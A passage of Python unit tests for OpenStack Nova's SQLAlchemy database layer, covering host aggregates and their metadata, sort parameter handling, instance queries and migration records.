expected_dict = {'deleted_at': t2, 'updated_at': t3_utc}
sqlalchemy_api.convert_objects_related_datetimes(test3, *datetime_keys)
self.assertEqual(test3, expected_dict)
def test_model_query_invalid_arguments(self):
# read_deleted shouldn't accept invalid values
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted=False)
self.assertRaises(ValueError, sqlalchemy_api.model_query,
self.context, models.Instance, read_deleted="foo")
# Check model is a valid model
self.assertRaises(TypeError, sqlalchemy_api.model_query,
self.context, "")
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_false(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=False)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_no_slave_connection(self, mock_get_session):
self.flags(slave_connection='', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_use_slave_true(self, mock_get_session):
self.flags(slave_connection='foo://bar', group='database')
sqlalchemy_api.model_query(self.context, models.Instance,
use_slave=True)
mock_get_session.assert_called_once_with(use_slave=True)
@mock.patch.object(sqlalchemy_api, 'get_session')
def test_model_query_lazy_session_default(self, mock_get_session):
sqlalchemy_api.model_query(self.context, models.Instance,
session=mock.MagicMock())
self.assertFalse(mock_get_session.called)
class AggregateDBApiTestCase(test.TestCase):
def setUp(self):
super(AggregateDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
def test_aggregate_create_no_metadata(self):
result = _create_aggregate(metadata=None)
self.assertEqual(result['name'], 'fake_aggregate')
def test_aggregate_create_avoid_name_conflict(self):
r1 = _create_aggregate(metadata=None)
db.aggregate_delete(context.get_admin_context(), r1['id'])
values = {'name': r1['name']}
metadata = {'availability_zone': 'new_zone'}
r2 = _create_aggregate(values=values, metadata=metadata)
self.assertEqual(r2['name'], values['name'])
self.assertEqual(r2['availability_zone'],
metadata['availability_zone'])
def test_aggregate_create_raise_exist_exc(self):
_create_aggregate(metadata=None)
self.assertRaises(exception.AggregateNameExists,
_create_aggregate, metadata=None)
def test_aggregate_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_get,
ctxt, aggregate_id)
def test_aggregate_metadata_get_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_metadata_get,
ctxt, aggregate_id)
def test_aggregate_create_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
def test_aggregate_create_delete_create_with_metadata(self):
# test for bug 1052479
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(expected_metadata,
matchers.DictMatches(_get_fake_aggr_metadata()))
db.aggregate_delete(ctxt, result['id'])
result = _create_aggregate(metadata={'availability_zone':
'fake_avail_zone'})
expected_metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertEqual(expected_metadata, {'availability_zone':
'fake_avail_zone'})
def test_aggregate_get(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt)
expected = db.aggregate_get(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected['hosts'])
self.assertEqual(_get_fake_aggr_metadata(), expected['metadetails'])
def test_aggregate_get_by_host(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
values5 = {'name': 'fake_aggregate5'}
a1 = _create_aggregate_with_hosts(context=ctxt)
a2 = _create_aggregate_with_hosts(context=ctxt, values=values2)
# a3 has no hosts and should not be in the results.
_create_aggregate(context=ctxt, values=values3)
# a4 has no matching hosts.
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'])
# a5 has no matching hosts after deleting the only matching host.
a5 = _create_aggregate_with_hosts(context=ctxt, values=values5,
hosts=['foo5.openstack.org', 'foo.openstack.org'])
db.aggregate_host_delete(ctxt, a5['id'],
'foo.openstack.org')
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual([a1['id'], a2['id']], [x['id'] for x in r1])
def test_aggregate_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate2'}
values3 = {'name': 'fake_aggregate3'}
values4 = {'name': 'fake_aggregate4'}
a1 = _create_aggregate_with_hosts(context=ctxt,
metadata={'goodkey': 'good'})
_create_aggregate_with_hosts(context=ctxt, values=values2)
_create_aggregate(context=ctxt, values=values3)
_create_aggregate_with_hosts(context=ctxt, values=values4,
hosts=['foo4.openstack.org'], metadata={'goodkey': 'bad'})
# filter result by key
r1 = db.aggregate_get_by_host(ctxt, 'foo.openstack.org', key='goodkey')
self.assertEqual([a1['id']], [x['id'] for x in r1])
def test_aggregate_metadata_get_by_host(self):
ctxt = context.get_admin_context()
values = {'name': 'fake_aggregate2'}
values2 = {'name': 'fake_aggregate3'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=['bar.openstack.org'], metadata={'badkey': 'bad'})
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo.openstack.org')
self.assertEqual(r1['fake_key1'], set(['fake_value1']))
self.assertNotIn('badkey', r1)
def test_aggregate_metadata_get_by_metadata_key(self):
ctxt = context.get_admin_context()
values = {'aggregate_id': 'fake_id',
'name': 'fake_aggregate'}
aggr = _create_aggregate_with_hosts(context=ctxt, values=values,
hosts=['bar.openstack.org'],
metadata={'availability_zone':
'az1'})
r1 = db.aggregate_metadata_get_by_metadata_key(ctxt, aggr['id'],
'availability_zone')
self.assertEqual(r1['availability_zone'], set(['az1']))
self.assertIn('availability_zone', r1)
self.assertNotIn('name', r1)
def test_aggregate_metadata_get_by_host_with_key(self):
ctxt = context.get_admin_context()
values2 = {'name': 'fake_aggregate12'}
values3 = {'name': 'fake_aggregate23'}
a2_hosts = ['foo1.openstack.org', 'foo2.openstack.org']
a2_metadata = {'good': 'value12', 'bad': 'badvalue12'}
a3_hosts = ['foo2.openstack.org', 'foo3.openstack.org']
a3_metadata = {'good': 'value23', 'bad': 'badvalue23'}
_create_aggregate_with_hosts(context=ctxt)
_create_aggregate_with_hosts(context=ctxt, values=values2,
hosts=a2_hosts, metadata=a2_metadata)
a3 = _create_aggregate_with_hosts(context=ctxt, values=values3,
hosts=a3_hosts, metadata=a3_metadata)
r1 = db.aggregate_metadata_get_by_host(ctxt, 'foo2.openstack.org',
key='good')
self.assertEqual(r1['good'], set(['value12', 'value23']))
self.assertNotIn('fake_key1', r1)
self.assertNotIn('bad', r1)
# Delete metadata
db.aggregate_metadata_delete(ctxt, a3['id'], 'good')
r2 = db.aggregate_metadata_get_by_host(ctxt, 'foo3.openstack.org',
key='good')
self.assertNotIn('good', r2)
def test_aggregate_get_by_host_not_found(self):
ctxt = context.get_admin_context()
_create_aggregate_with_hosts(context=ctxt)
self.assertEqual([], db.aggregate_get_by_host(ctxt, 'unknown_host'))
def test_aggregate_delete_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
self.assertRaises(exception.AggregateNotFound,
db.aggregate_delete,
ctxt, aggregate_id)
def test_aggregate_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
db.aggregate_delete(ctxt, result['id'])
expected = db.aggregate_get_all(ctxt)
self.assertEqual(0, len(expected))
aggregate = db.aggregate_get(ctxt.elevated(read_deleted='yes'),
result['id'])
self.assertEqual(aggregate['deleted'], result['id'])
def test_aggregate_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
self.assertEqual(result['availability_zone'], 'fake_avail_zone')
new_values = _get_fake_aggr_values()
new_values['availability_zone'] = 'different_avail_zone'
updated = db.aggregate_update(ctxt, result['id'], new_values)
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['availability_zone'] = 'different_avail_zone'
db.aggregate_update(ctxt, result['id'], values)
expected = db.aggregate_metadata_get(ctxt, result['id'])
updated = db.aggregate_get(ctxt, result['id'])
self.assertThat(values['metadata'],
matchers.DictMatches(expected))
self.assertNotEqual(result['availability_zone'],
updated['availability_zone'])
def test_aggregate_update_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
values = _get_fake_aggr_values()
values['metadata'] = _get_fake_aggr_metadata()
values['metadata']['fake_key1'] = 'foo'
db.aggregate_update(ctxt, result['id'], values)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(values['metadata'], matchers.DictMatches(expected))
def test_aggregate_update_zone_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
new_zone = {'availability_zone': 'fake_avail_zone_2'}
metadata = _get_fake_aggr_metadata()
metadata.update(new_zone)
db.aggregate_update(ctxt, result['id'], new_zone)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_update_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
new_values = _get_fake_aggr_values()
self.assertRaises(exception.AggregateNotFound,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_update_raise_name_exist(self):
ctxt = context.get_admin_context()
_create_aggregate(context=ctxt, values={'name': 'test1'},
metadata={'availability_zone': 'fake_avail_zone'})
_create_aggregate(context=ctxt, values={'name': 'test2'},
metadata={'availability_zone': 'fake_avail_zone'})
aggregate_id = 1
new_values = {'name': 'test2'}
self.assertRaises(exception.AggregateNameExists,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_get_all(self):
ctxt = context.get_admin_context()
counter = 3
for c in range(counter):
_create_aggregate(context=ctxt,
values={'name': 'fake_aggregate_%d' % c},
metadata=None)
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), counter)
def test_aggregate_get_all_non_deleted(self):
ctxt = context.get_admin_context()
add_counter = 5
remove_counter = 2
aggregates = []
for c in range(1, add_counter):
values = {'name': 'fake_aggregate_%d' % c}
aggregates.append(_create_aggregate(context=ctxt,
values=values, metadata=None))
for c in range(1, remove_counter):
db.aggregate_delete(ctxt, aggregates[c - 1]['id'])
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), add_counter - remove_counter)
def test_aggregate_metadata_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_and_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = metadata.keys()[0]
new_metadata = {key: 'foo',
'fake_new_key': 'fake_new_value'}
metadata.update(new_metadata)
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_retry(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
def counted():
def get_query(context, id, session, read_deleted):
get_query.counter += 1
raise db_exc.DBDuplicateEntry
get_query.counter = 0
return get_query
get_query = counted()
self.stubs.Set(sqlalchemy_api,
'_aggregate_metadata_get_query', get_query)
self.assertRaises(db_exc.DBDuplicateEntry, sqlalchemy_api.
aggregate_metadata_add, ctxt, result['id'], {},
max_retries=5)
self.assertEqual(get_query.counter, 5)
def test_aggregate_metadata_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = metadata.keys()[0]
db.aggregate_metadata_delete(ctxt, result['id'], key)
new_metadata = {key: 'foo'}
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
metadata[key] = 'foo'
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
db.aggregate_metadata_delete(ctxt, result['id'], metadata.keys()[0])
expected = db.aggregate_metadata_get(ctxt, result['id'])
del metadata[metadata.keys()[0]]
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_remove_availability_zone(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
db.aggregate_metadata_delete(ctxt, result['id'], 'availability_zone')
expected = db.aggregate_metadata_get(ctxt, result['id'])
aggregate = db.aggregate_get(ctxt, result['id'])
self.assertIsNone(aggregate['availability_zone'])
self.assertThat({}, matchers.DictMatches(expected))
def test_aggregate_metadata_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateMetadataNotFound,
db.aggregate_metadata_delete,
ctxt, result['id'], 'foo_key')
def test_aggregate_host_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected)
def test_aggregate_host_re_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
host = _get_fake_aggr_hosts()[0]
db.aggregate_host_delete(ctxt, result['id'], host)
db.aggregate_host_add(ctxt, result['id'], host)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(len(expected), 1)
def test_aggregate_host_add_duplicate_works(self):
ctxt = context.get_admin_context()
r1 = _create_aggregate_with_hosts(context=ctxt, metadata=None)
r2 = _create_aggregate_with_hosts(ctxt,
values={'name': 'fake_aggregate2'},
metadata={'availability_zone': 'fake_avail_zone2'})
h1 = db.aggregate_host_get_all(ctxt, r1['id'])
h2 = db.aggregate_host_get_all(ctxt, r2['id'])
self.assertEqual(h1, h2)
def test_aggregate_host_add_duplicate_raise_exist_exc(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
self.assertRaises(exception.AggregateHostExists,
db.aggregate_host_add,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
def test_aggregate_host_add_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
host = _get_fake_aggr_hosts()[0]
self.assertRaises(exception.AggregateNotFound,
db.aggregate_host_add,
ctxt, aggregate_id, host)
def test_aggregate_host_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
db.aggregate_host_delete(ctxt, result['id'],
_get_fake_aggr_hosts()[0])
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(0, len(expected))
def test_aggregate_host_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateHostNotFound,
db.aggregate_host_delete,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
class SqlAlchemyDbApiNoDbTestCase(test.NoDBTestCase):
"""No-DB test class for simple test cases that do not require a backend."""
def test_manual_join_columns_immutable_list(self):
# Tests that _manual_join_columns doesn't modify the list passed in.
columns_to_join = ['system_metadata', 'test']
manual_joins, columns_to_join2 = (
sqlalchemy_api._manual_join_columns(columns_to_join))
self.assertEqual(['system_metadata'], manual_joins)
self.assertEqual(['test'], columns_to_join2)
self.assertEqual(['system_metadata', 'test'], columns_to_join)
class SqlAlchemyDbApiTestCase(DbTestCase):
def test_instance_get_all_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
def test_instance_get_all_uuids_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
self.assertEqual(types.UnicodeType, type(result[0]))
def test_instance_get_active_by_window_joined(self):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
start_time = now - datetime.timedelta(minutes=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
ctxt = context.get_admin_context()
# used for testing columns_to_join
network_info = jsonutils.dumps({'ckey': 'cvalue'})
sample_data = {
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'network_info': network_info},
}
self.create_instance_with_args(launched_at=now, **sample_data)
self.create_instance_with_args(launched_at=now1, terminated_at=now2,
**sample_data)
self.create_instance_with_args(launched_at=now2, terminated_at=now3,
**sample_data)
self.create_instance_with_args(launched_at=now3, terminated_at=None,
**sample_data)
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now)
self.assertEqual(4, len(result))
# verify that all default columns are joined
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now3, columns_to_join=['info_cache'])
self.assertEqual(2, len(result))
# verify that only info_cache is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now)
self.assertEqual(0, len(result))
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now2,
columns_to_join=['system_metadata'])
self.assertEqual(2, len(result))
# verify that only system_metadata is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertNotIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now2, end=now3,
columns_to_join=['metadata', 'info_cache'])
self.assertEqual(2, len(result))
# verify that only metadata and info_cache are loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual({}, sys_meta)
self.assertIn('info_cache', result[0])
self.assertEqual(network_info, result[0]['info_cache']['network_info'])
@mock.patch('nova.db.sqlalchemy.api.instance_get_all_by_filters_sort')
def test_instance_get_all_by_filters_calls_sort(self,
mock_get_all_filters_sort):
'''Verifies instance_get_all_by_filters calls the sort function.'''
# sort parameters should be wrapped in a list, all other parameters
# should be passed through
ctxt = context.get_admin_context()
sqlalchemy_api.instance_get_all_by_filters(ctxt, {'foo': 'bar'},
'sort_key', 'sort_dir', limit=100, marker='uuid',
columns_to_join='columns', use_slave=True)
mock_get_all_filters_sort.assert_called_once_with(ctxt, {'foo': 'bar'},
limit=100, marker='uuid', columns_to_join='columns',
use_slave=True, sort_keys=['sort_key'], sort_dirs=['sort_dir'])
class ProcessSortParamTestCase(test.TestCase):
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
# Default direction is the first key in the list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)
class MigrationTestCase(test.TestCase):
def setUp(self):
super(MigrationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self._create()
self._create()
self._create(status='reverted')
self._create(status='confirmed')
self._create(status='error')
self._create(source_compute='host2', source_node='b',
dest_compute='host1', dest_node='a')
self._create(source_compute='host2', dest_compute='host3')
self._create(source_compute='host3', dest_compute='host4')
def _create(self, status='migrating', source_compute='host1',
source_node='a', dest_compute='host2', dest_node='b',
system_metadata=None):
values = {'host': source_compute}
instance = db.instance_create(self.ctxt, values)
if system_metadata:
db.instance_system_metadata_update(self.ctxt, instance['uuid'],
system_metadata, False)
values = {'status': status, 'source_compute': source_compute,
'source_node': source_node, 'dest_compute': dest_compute,
'dest_node': dest_node, 'instance_uuid': instance['uuid']}
db.migration_create(self.ctxt, values)
def _assert_in_progress(self, migrations):
for migration in migrations:
self.assertNotEqual('confirmed', migration['status'])
self.assertNotEqual('reverted', migration['status'])
self.assertNotEqual('error', migration['status'])
def test_migration_get_in_progress_joins(self):
self._create(source_compute='foo', system_metadata={'foo': 'bar'})
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'foo', 'a')
system_metadata = migrations[0]['instance']['system_metadata'][0]
self.assertEqual(system_metadata['key'], 'foo')
self.assertEqual(system_metadata['value'], 'bar')
def test_in_progress_host1_nodea(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'a')
# 2 as source + 1 as dest
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_in_progress_host1_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'b')
# some migrations are to/from host1, but none with a node 'b'
self.assertEqual(0, len(migrations))
def test_in_progress_host2_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
# 2 as dest, 1 as source
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_instance_join(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
for migration in migrations:
instance = migration['instance']
self.assertEqual(migration['instance_uuid'], instance['uuid'])
def test_get_migrations_by_filters(self):
filters = {"status": "migrating", "host": "host3"}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
for migration in migrations:
self.assertEqual(filters["status"], migration['status'])
hosts = [migration['source_compute'], migration['dest_compute']]
self.assertIn(filters["host"], hosts)
def test_only_admin_can_get_all_migrations_by_filters(self):
user_ctxt = context.RequestContext(user_id=None, project_id=None,
is_admin=False, read_deleted="no",
overwrite=False)
self.assertRaises(exception.AdminRequired,
db.migration_get_all_by_filters, user_ctxt, {})
def test_migration_get_unconfirmed_by_dest_compute(self):
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(0, len(results))
updated_at = datetime.datetime(2000, 1, 1, 12, 0, 0)
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
# Ensure different host is not returned
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure one migration older than 10 seconds is returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(1, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
# Ensure the new migration is not returned.
updated_at = timeutils.utcnow()
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
"fake_host2")
self.assertEqual(0, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
def test_migration_update_not_found(self):
self.assertRaises(exception.MigrationNotFound,
db.migration_update, self.ctxt, 42, {})
class ModelsObjectComparatorMixin(object):
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
return {k: v for k, v in obj.iteritems()
if k not in ignored_keys}
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(len(obj1),
len(obj2),
"Keys mismatch: %s" %
str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.iteritems():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualOrderedListOfObjects(self, objs1, objs2,
ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
conv = lambda obj: map(obj_to_dict, obj)
self.assertEqual(conv(objs1), conv(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)
